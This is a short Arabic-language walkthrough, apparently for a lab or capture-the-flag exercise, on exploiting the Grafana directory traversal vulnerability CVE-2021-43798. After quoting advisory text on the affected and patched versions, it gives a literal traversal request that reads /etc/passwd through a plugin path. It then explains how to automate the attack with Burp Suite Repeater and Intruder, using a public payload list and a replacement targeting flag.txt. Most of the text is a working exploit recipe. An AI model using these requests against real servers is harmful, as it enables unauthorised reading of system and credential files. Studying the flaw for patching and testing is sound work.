
استغلال ثغرة اجتياز الدليل في Grafana (CVE-2021-43798) مع تكامل Burp Suite وأتمتة التحميل للوصول إلى الملفات المحلية على الخوادم الضعيفة.
إصدارات Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصلحة) معرضة لاجتياز الدليل، مما يسمح بالوصول إلى الملفات المحلية.
Grafana هي منصة مفتوحة المصدر للمراقبة والرصد. إصدارات Grafana من 8.0.0-beta1 إلى 8.3.0 (باستثناء الإصدارات المصلحة) معرضة لاجتياز الدليل، مما يسمح بالوصول إلى الملفات المحلية. مسار URL الضعيف هو: <grafana_host_url>/public/plugins//، حيث <plugin-id> هو معرف المكون الإضافي لأي مكون إضافي مثبت. لم يكن Grafana Cloud ضعيفًا في أي وقت. يُنصح المستخدمون بالترقية إلى الإصدارات المصلحة 8.0.7 و8.1.8 و8.2.7 أو 8.3.1. يحتوي GitHub Security Advisory على مزيد من المعلومات حول مسارات URL الضعيفة وطرق التخفيف وجدول الإفصاح.
باستخدام Burp Suite
أرسل طلب GET إلى Repeater
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
ثم أرسله إلى Intruder
GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
باستخدام Sniper للهجوم
Payload copy from github https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
Paypload processing Match [{FILE}] replace with {flag.txt}